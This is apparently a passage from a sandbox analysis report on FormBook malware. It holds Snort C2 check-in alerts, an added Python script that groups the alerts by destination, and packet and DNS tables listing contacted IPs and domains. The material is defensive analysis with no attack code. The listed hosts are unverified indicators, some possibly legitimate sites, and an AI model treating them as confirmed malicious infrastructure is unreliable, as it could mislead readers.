04/08/21-13:22:55.232579  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49774        80         192.168.2.4     34.102.136.180
04/08/21-13:22:55.232579  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49774        80         192.168.2.4     34.102.136.180
04/08/21-13:22:55.232579  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49774        80         192.168.2.4     34.102.136.180
04/08/21-13:22:55.347369  TCP       1201     ATTACK-RESPONSES 403 Forbidden                 80           49774      34.102.136.180  192.168.2.4
04/08/21-13:23:23.204497  ICMP      402      ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.4     8.8.8.8
04/08/21-13:23:24.222015  ICMP      402      ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.4     8.8.8.8
04/08/21-13:23:26.237204  ICMP      402      ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.4     8.8.8.8
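Three Emerging Threats rules (SIDs 2031453, 2031449 and 2031412) fire on every FormBook check-in GET, so the table above holds twelve alerts for only four destinations, and one of those destinations (34.102.136.180) answered with a 403 that rule 1201 caught on the same connection. Which of the four is the live panel cannot be read from the alerts alone, but reducing the table to one line per destination with its evidence is the first step of the write-up. The script below is an added example, not part of the report: it parses rows in the column layout used above (transcribed here as constructed input), groups outbound alerts by destination, attaches any inbound ATTACK-RESPONSES alert seen on the same client port, and reports the spacing between successive check-ins. The sandbox address 192.168.2.4 is taken from the table; the regex and the port-based pairing of request and response alerts are my assumptions about the layout, not a Snort feature.

```python
import re
from datetime import datetime

# Snort alert rows transcribed from this report's "Snort IDS Alerts" table
# (constructed input for the example; same columns as the table, "-" for no port).
ALERT_TEXT = """\
04/08/21-13:22:17.851992  TCP   2031453  ET TROJAN FormBook CnC Checkin (GET)  49764  80  192.168.2.4  162.241.244.61
04/08/21-13:22:17.851992  TCP   2031449  ET TROJAN FormBook CnC Checkin (GET)  49764  80  192.168.2.4  162.241.244.61
04/08/21-13:22:17.851992  TCP   2031412  ET TROJAN FormBook CnC Checkin (GET)  49764  80  192.168.2.4  162.241.244.61
04/08/21-13:22:23.881720  TCP   2031453  ET TROJAN FormBook CnC Checkin (GET)  49770  80  192.168.2.4  107.178.142.156
04/08/21-13:22:23.881720  TCP   2031449  ET TROJAN FormBook CnC Checkin (GET)  49770  80  192.168.2.4  107.178.142.156
04/08/21-13:22:23.881720  TCP   2031412  ET TROJAN FormBook CnC Checkin (GET)  49770  80  192.168.2.4  107.178.142.156
04/08/21-13:22:50.107975  TCP   2031453  ET TROJAN FormBook CnC Checkin (GET)  49772  80  192.168.2.4  35.246.6.109
04/08/21-13:22:50.107975  TCP   2031449  ET TROJAN FormBook CnC Checkin (GET)  49772  80  192.168.2.4  35.246.6.109
04/08/21-13:22:50.107975  TCP   2031412  ET TROJAN FormBook CnC Checkin (GET)  49772  80  192.168.2.4  35.246.6.109
04/08/21-13:22:55.232579  TCP   2031453  ET TROJAN FormBook CnC Checkin (GET)  49774  80  192.168.2.4  34.102.136.180
04/08/21-13:22:55.232579  TCP   2031449  ET TROJAN FormBook CnC Checkin (GET)  49774  80  192.168.2.4  34.102.136.180
04/08/21-13:22:55.232579  TCP   2031412  ET TROJAN FormBook CnC Checkin (GET)  49774  80  192.168.2.4  34.102.136.180
04/08/21-13:22:55.347369  TCP   1201     ATTACK-RESPONSES 403 Forbidden  80  49774  34.102.136.180  192.168.2.4
04/08/21-13:23:23.204497  ICMP  402      ICMP Destination Unreachable Port Unreachable  -  -  192.168.2.4  8.8.8.8
04/08/21-13:23:24.222015  ICMP  402      ICMP Destination Unreachable Port Unreachable  -  -  192.168.2.4  8.8.8.8
04/08/21-13:23:26.237204  ICMP  402      ICMP Destination Unreachable Port Unreachable  -  -  192.168.2.4  8.8.8.8
"""

SANDBOX_HOST = "192.168.2.4"   # the analysis VM, as shown in the table

# Column layout of the table above (ASSUMED): timestamp, protocol, SID, free-text
# message, source port, dest port ("-" when the protocol has none), source IP, dest IP.
ROW = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>TCP|UDP|ICMP)\s+(?P<sid>\d+)\s+(?P<msg>.*?)\s+"
    r"(?P<sport>\d+|-)\s+(?P<dport>\d+|-)\s+"
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\s+(?P<dst>\d+\.\d+\.\d+\.\d+)$"
)


def parse_alerts(text: str) -> list:
    """Turn the table rows into dicts with typed fields; refuse rows that do not fit."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            raise ValueError(f"unparsed alert row: {line!r}")
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%m/%d/%y-%H:%M:%S.%f")
        d["sid"] = int(d["sid"])
        d["sport"] = None if d["sport"] == "-" else int(d["sport"])
        d["dport"] = None if d["dport"] == "-" else int(d["dport"])
        rows.append(d)
    return rows


def c2_summary(alerts: list, host: str = SANDBOX_HOST) -> dict:
    """One entry per destination the sandbox host was flagged talking to, ordered by first
    sighting, with the set of SIDs that fired and any inbound ATTACK-RESPONSES alert that
    arrived on the same client port (ASSUMPTION: same client port == same connection)."""
    responses = {a["dport"]: a["msg"] for a in alerts
                 if a["proto"] == "TCP" and a["dst"] == host
                 and a["msg"].startswith("ATTACK-RESPONSES")}
    by_dst = {}
    for a in alerts:
        if a["proto"] != "TCP" or a["src"] != host:
            continue
        e = by_dst.setdefault(a["dst"], {"dport": a["dport"], "first_seen": a["ts"],
                                         "sids": set(), "client_ports": set(), "response": None})
        e["sids"].add(a["sid"])
        e["client_ports"].add(a["sport"])
        e["first_seen"] = min(e["first_seen"], a["ts"])
        if a["sport"] in responses:
            e["response"] = responses[a["sport"]]
    return dict(sorted(by_dst.items(), key=lambda kv: kv[1]["first_seen"]))


def checkin_intervals(summary: dict) -> list:
    """Seconds between successive first-seen check-ins, in order of appearance."""
    times = [v["first_seen"] for v in summary.values()]
    return [round((b - a).total_seconds(), 3) for a, b in zip(times, times[1:])]


if __name__ == "__main__":
    summary = c2_summary(parse_alerts(ALERT_TEXT))
    for ip, v in summary.items():
        print(f'{ip:<16} :{v["dport"]}  sids={sorted(v["sids"])}  response={v["response"] or "none flagged"}')
    print("seconds between check-ins:", checkin_intervals(summary))
```

For this report the summary collapses to four destinations on port 80, only the last of which has a flagged server response; the next step in practice is to join each destination against the TCP packet list and the HTTP requests (the Host headers, not shown in this section) before publishing any of the four addresses as an indicator.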

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Apr 8, 2021 13:22:07.208076954 CEST  49751        80         192.168.2.4      66.96.161.160
Apr 8, 2021 13:22:07.318911076 CEST  80           49751      66.96.161.160    192.168.2.4
Apr 8, 2021 13:22:07.319055080 CEST  49751        80         192.168.2.4      66.96.161.160
Apr 8, 2021 13:22:07.319251060 CEST  49751        80         192.168.2.4      66.96.161.160
Apr 8, 2021 13:22:07.437031031 CEST  80           49751      66.96.161.160    192.168.2.4
Apr 8, 2021 13:22:07.443166971 CEST  80           49751      66.96.161.160    192.168.2.4
Apr 8, 2021 13:22:07.443207026 CEST  80           49751      66.96.161.160    192.168.2.4
Apr 8, 2021 13:22:07.443396091 CEST  49751        80         192.168.2.4      66.96.161.160
Apr 8, 2021 13:22:07.443444014 CEST  49751        80         192.168.2.4      66.96.161.160
Apr 8, 2021 13:22:07.554378986 CEST  80           49751      66.96.161.160    192.168.2.4
Apr 8, 2021 13:22:17.702614069 CEST  49764        80         192.168.2.4      162.241.244.61
Apr 8, 2021 13:22:17.851721048 CEST  80           49764      162.241.244.61   192.168.2.4
Apr 8, 2021 13:22:17.851872921 CEST  49764        80         192.168.2.4      162.241.244.61
Apr 8, 2021 13:22:17.851991892 CEST  49764        80         192.168.2.4      162.241.244.61
Apr 8, 2021 13:22:17.994587898 CEST  80           49764      162.241.244.61   192.168.2.4
Apr 8, 2021 13:22:18.359489918 CEST  49764        80         192.168.2.4      162.241.244.61
Apr 8, 2021 13:22:18.542831898 CEST  80           49764      162.241.244.61   192.168.2.4
Apr 8, 2021 13:22:18.669209003 CEST  80           49764      162.241.244.61   192.168.2.4
Apr 8, 2021 13:22:18.669230938 CEST  80           49764      162.241.244.61   192.168.2.4
Apr 8, 2021 13:22:18.669306040 CEST  49764        80         192.168.2.4      162.241.244.61
Apr 8, 2021 13:22:18.669331074 CEST  49764        80         192.168.2.4      162.241.244.61
Apr 8, 2021 13:22:23.712862968 CEST  49770        80         192.168.2.4      107.178.142.156
Apr 8, 2021 13:22:23.881352901 CEST  80           49770      107.178.142.156  192.168.2.4
Apr 8, 2021 13:22:23.881531954 CEST  49770        80         192.168.2.4      107.178.142.156
Apr 8, 2021 13:22:23.881720066 CEST  49770        80         192.168.2.4      107.178.142.156
Apr 8, 2021 13:22:24.249051094 CEST  80           49770      107.178.142.156  192.168.2.4
Apr 8, 2021 13:22:24.391254902 CEST  49770        80         192.168.2.4      107.178.142.156
Apr 8, 2021 13:22:24.557790995 CEST  80           49770      107.178.142.156  192.168.2.4
Apr 8, 2021 13:22:27.418097019 CEST  80           49770      107.178.142.156  192.168.2.4
Apr 8, 2021 13:22:27.418112040 CEST  80           49770      107.178.142.156  192.168.2.4
Apr 8, 2021 13:22:27.418188095 CEST  49770        80         192.168.2.4      107.178.142.156
Apr 8, 2021 13:22:27.418340921 CEST  49770        80         192.168.2.4      107.178.142.156
Apr 8, 2021 13:22:44.781671047 CEST  49771        80         192.168.2.4      199.59.242.153
Apr 8, 2021 13:22:44.891897917 CEST  80           49771      199.59.242.153   192.168.2.4
Apr 8, 2021 13:22:44.892003059 CEST  49771        80         192.168.2.4      199.59.242.153
Apr 8, 2021 13:22:44.892147064 CEST  49771        80         192.168.2.4      199.59.242.153
Apr 8, 2021 13:22:45.002394915 CEST  80           49771      199.59.242.153   192.168.2.4
Apr 8, 2021 13:22:45.002899885 CEST  80           49771      199.59.242.153   192.168.2.4
Apr 8, 2021 13:22:45.002926111 CEST  80           49771      199.59.242.153   192.168.2.4
Apr 8, 2021 13:22:45.002974033 CEST  80           49771      199.59.242.153   192.168.2.4
Apr 8, 2021 13:22:45.002993107 CEST  80           49771      199.59.242.153   192.168.2.4
Apr 8, 2021 13:22:45.003007889 CEST  80           49771      199.59.242.153   192.168.2.4
Apr 8, 2021 13:22:45.003110886 CEST  49771        80         192.168.2.4      199.59.242.153
Apr 8, 2021 13:22:45.003139019 CEST  49771        80         192.168.2.4      199.59.242.153
Apr 8, 2021 13:22:45.003252983 CEST  49771        80         192.168.2.4      199.59.242.153
Apr 8, 2021 13:22:50.074331045 CEST  49772        80         192.168.2.4      35.246.6.109
Apr 8, 2021 13:22:50.107506990 CEST  80           49772      35.246.6.109     192.168.2.4
Apr 8, 2021 13:22:50.107790947 CEST  49772        80         192.168.2.4      35.246.6.109
Apr 8, 2021 13:22:50.107975006 CEST  49772        80         192.168.2.4      35.246.6.109
Apr 8, 2021 13:22:50.139882088 CEST  80           49772      35.246.6.109     192.168.2.4
Apr 8, 2021 13:22:50.173912048 CEST  80           49772      35.246.6.109     192.168.2.4
Apr 8, 2021 13:22:50.173933983 CEST  80           49772      35.246.6.109     192.168.2.4
Apr 8, 2021 13:22:50.174128056 CEST  49772        80         192.168.2.4      35.246.6.109
Apr 8, 2021 13:22:50.174240112 CEST  49772        80         192.168.2.4      35.246.6.109
Apr 8, 2021 13:22:50.206252098 CEST  80           49772      35.246.6.109     192.168.2.4
Apr 8, 2021 13:22:55.219860077 CEST  49774        80         192.168.2.4      34.102.136.180
Apr 8, 2021 13:22:55.232299089 CEST  80           49774      34.102.136.180   192.168.2.4
Apr 8, 2021 13:22:55.232404947 CEST  49774        80         192.168.2.4      34.102.136.180
Apr 8, 2021 13:22:55.232578993 CEST  49774        80         192.168.2.4      34.102.136.180
Apr 8, 2021 13:22:55.245090008 CEST  80           49774      34.102.136.180   192.168.2.4
Apr 8, 2021 13:22:55.347368956 CEST  80           49774      34.102.136.180   192.168.2.4
Apr 8, 2021 13:22:55.347384930 CEST  80           49774      34.102.136.180   192.168.2.4
Apr 8, 2021 13:22:55.347610950 CEST  49774        80         192.168.2.4      34.102.136.180
Apr 8, 2021 13:22:55.361360073 CEST  80           49774      34.102.136.180   192.168.2.4
Apr 8, 2021 13:23:00.419142962 CEST  49776        80         192.168.2.4      184.168.131.241
Apr 8, 2021 13:23:00.599010944 CEST  80           49776      184.168.131.241  192.168.2.4
Apr 8, 2021 13:23:00.599234104 CEST  49776        80         192.168.2.4      184.168.131.241
Apr 8, 2021 13:23:00.599381924 CEST  49776        80         192.168.2.4      184.168.131.241
Apr 8, 2021 13:23:00.779186964 CEST  80           49776      184.168.131.241  192.168.2.4
Apr 8, 2021 13:23:00.805794001 CEST  80           49776      184.168.131.241  192.168.2.4
Apr 8, 2021 13:23:00.805819988 CEST  80           49776      184.168.131.241  192.168.2.4
Apr 8, 2021 13:23:00.805941105 CEST  49776        80         192.168.2.4      184.168.131.241
Apr 8, 2021 13:23:00.806032896 CEST  49776        80         192.168.2.4      184.168.131.241
Apr 8, 2021 13:23:00.985886097 CEST  80           49776      184.168.131.241  192.168.2.4
Apr 8, 2021 13:23:06.522414923 CEST  49777        80         192.168.2.4      184.168.131.241
Apr 8, 2021 13:23:06.701513052 CEST  80           49777      184.168.131.241  192.168.2.4
Apr 8, 2021 13:23:06.701639891 CEST  49777        80         192.168.2.4      184.168.131.241
Apr 8, 2021 13:23:06.701818943 CEST  49777        80         192.168.2.4      184.168.131.241
Apr 8, 2021 13:23:06.880739927 CEST  80           49777      184.168.131.241  192.168.2.4
Apr 8, 2021 13:23:06.904542923 CEST  80           49777      184.168.131.241  192.168.2.4
Apr 8, 2021 13:23:06.904571056 CEST  80           49777      184.168.131.241  192.168.2.4
Apr 8, 2021 13:23:06.904774904 CEST  49777        80         192.168.2.4      184.168.131.241
Apr 8, 2021 13:23:06.904892921 CEST  49777        80         192.168.2.4      184.168.131.241
Apr 8, 2021 13:23:07.083766937 CEST  80           49777      184.168.131.241  192.168.2.4
Apr 8, 2021 13:23:11.994615078 CEST  49778        80         192.168.2.4      216.239.36.21
Apr 8, 2021 13:23:12.006978989 CEST  80           49778      216.239.36.21    192.168.2.4
Apr 8, 2021 13:23:12.007117987 CEST  49778        80         192.168.2.4      216.239.36.21
Apr 8, 2021 13:23:12.007415056 CEST  49778        80         192.168.2.4      216.239.36.21
Apr 8, 2021 13:23:12.019741058 CEST  80           49778      216.239.36.21    192.168.2.4
Apr 8, 2021 13:23:12.111870050 CEST  80           49778      216.239.36.21    192.168.2.4
Apr 8, 2021 13:23:12.111903906 CEST  80           49778      216.239.36.21    192.168.2.4
Apr 8, 2021 13:23:12.111923933 CEST  80           49778      216.239.36.21    192.168.2.4
Apr 8, 2021 13:23:12.111938953 CEST  80           49778      216.239.36.21    192.168.2.4
Apr 8, 2021 13:23:12.111954927 CEST  80           49778      216.239.36.21    192.168.2.4
Apr 8, 2021 13:23:12.112023115 CEST  49778        80         192.168.2.4      216.239.36.21
Apr 8, 2021 13:23:12.112061024 CEST  80           49778      216.239.36.21    192.168.2.4
Apr 8, 2021 13:23:12.112114906 CEST  49778        80         192.168.2.4      216.239.36.21
Apr 8, 2021 13:23:12.112117052 CEST  80           49778      216.239.36.21    192.168.2.4
Apr 8, 2021 13:23:12.112144947 CEST  80           49778      216.239.36.21    192.168.2.4
Apr 8, 2021 13:23:12.112189054 CEST  49778        80         192.168.2.4      216.239.36.21

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2021 13:21:13.343260050 CEST | 59123 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:13.362189054 CEST | 53 | 59123 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:13.465718985 CEST | 54531 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:13.478009939 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:19.525571108 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:19.538274050 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:21.111433983 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:21.124315977 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:21.868928909 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:21.881489038 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:22.641695976 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:22.654412985 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:23.398318052 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:23.410882950 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:24.547111988 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:24.597687006 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:25.536561966 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:25.548954010 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:26.429022074 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:26.441953897 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:27.105659008 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:27.118328094 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:28.168332100 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:28.180963039 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:28.969247103 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:28.982186079 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:29.601039886 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:29.614193916 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:30.808002949 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:30.820566893 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:31.515443087 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:31.528103113 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:32.282509089 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:32.295661926 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:33.046641111 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:33.059272051 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:33.705163002 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:33.717596054 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:43.289284945 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:43.302186012 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:21:57.012099981 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:21:57.029795885 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:07.081368923 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:07.200592995 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:07.438846111 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:07.452756882 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:09.531831026 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:09.544730902 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:10.179213047 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:10.192509890 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:10.773109913 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:10.785067081 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:11.014154911 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:11.041070938 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:11.115132093 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:11.128747940 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:11.542536974 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:11.556617975 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:12.122549057 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:12.197274923 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:12.456660032 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:12.511807919 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:12.653134108 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:12.666035891 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:13.690680981 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:13.703289032 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:15.543047905 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:15.674556971 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:16.029027939 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:16.133337975 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:17.520349979 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:17.701608896 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:23.405999899 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:23.537040949 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:23.561050892 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:23.711600065 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:29.411036968 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:29.453022957 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:34.461175919 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:34.608465910 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:44.664508104 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:44.780318975 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:50.023492098 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:50.072901964 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:54.189313889 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:54.202052116 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:55.178546906 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:55.218827963 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:22:55.892683983 CEST | 57525 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:22:55.906056881 CEST | 53 | 57525 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:23:00.396368027 CEST | 53814 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:23:00.417926073 CEST | 53 | 53814 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:23:06.480061054 CEST | 53418 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:23:06.521147013 CEST | 53 | 53418 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:23:11.916363001 CEST | 62833 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:23:11.993323088 CEST | 53 | 62833 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:23:17.182508945 CEST | 59260 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:23:18.192764997 CEST | 59260 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:23:19.208389044 CEST | 59260 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:23:21.224176884 CEST | 59260 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:23:22.195578098 CEST | 53 | 59260 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:23:23.204312086 CEST | 53 | 59260 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:23:24.221883059 CEST | 53 | 59260 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:23:26.237104893 CEST | 53 | 59260 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 13:23:27.210115910 CEST | 49944 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 13:23:27.627649069 CEST | 53 | 49944 | 8.8.8.8 | 192.168.2.4

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Apr 8, 2021 13:23:23.204497099 CEST | 192.168.2.4 | 8.8.8.8 | cffe | (Port unreachable) | Destination Unreachable
Apr 8, 2021 13:23:24.222014904 CEST | 192.168.2.4 | 8.8.8.8 | cffe | (Port unreachable) | Destination Unreachable
Apr 8, 2021 13:23:26.237204075 CEST | 192.168.2.4 | 8.8.8.8 | cffe | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 13:22:07.081368923 CEST | 192.168.2.4 | 8.8.8.8 | 0xd067 | Standard query (0) | www.1364kensington.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:12.456660032 CEST | 192.168.2.4 | 8.8.8.8 | 0x1d91 | Standard query (0) | www.essentials-trading.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:17.520349979 CEST | 192.168.2.4 | 8.8.8.8 | 0x8094 | Standard query (0) | www.luegomusic.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:23.405999899 CEST | 192.168.2.4 | 8.8.8.8 | 0xa149 | Standard query (0) | www.kf350.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:29.411036968 CEST | 192.168.2.4 | 8.8.8.8 | 0xdeb5 | Standard query (0) | www.hzmsbg.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:34.461175919 CEST | 192.168.2.4 | 8.8.8.8 | 0x1013 | Standard query (0) | www.quickeasybites.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:44.664508104 CEST | 192.168.2.4 | 8.8.8.8 | 0x1d30 | Standard query (0) | www.pierresplayhouse.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:50.023492098 CEST | 192.168.2.4 | 8.8.8.8 | 0x79ee | Standard query (0) | www.thecapitalhut.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:55.178546906 CEST | 192.168.2.4 | 8.8.8.8 | 0xfb00 | Standard query (0) | www.ssfgasia.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:00.396368027 CEST | 192.168.2.4 | 8.8.8.8 | 0xa297 | Standard query (0) | www.desertfoxindustries.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:06.480061054 CEST | 192.168.2.4 | 8.8.8.8 | 0x7cc0 | Standard query (0) | www.tennesseewheelrepair.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:11.916363001 CEST | 192.168.2.4 | 8.8.8.8 | 0xd53 | Standard query (0) | www.rootedwithlovejax.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:17.182508945 CEST | 192.168.2.4 | 8.8.8.8 | 0xefcc | Standard query (0) | www.coloradocouponclub.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:18.192764997 CEST | 192.168.2.4 | 8.8.8.8 | 0xefcc | Standard query (0) | www.coloradocouponclub.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:19.208389044 CEST | 192.168.2.4 | 8.8.8.8 | 0xefcc | Standard query (0) | www.coloradocouponclub.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:21.224176884 CEST | 192.168.2.4 | 8.8.8.8 | 0xefcc | Standard query (0) | www.coloradocouponclub.com | A (IP address) | IN (0x0001)
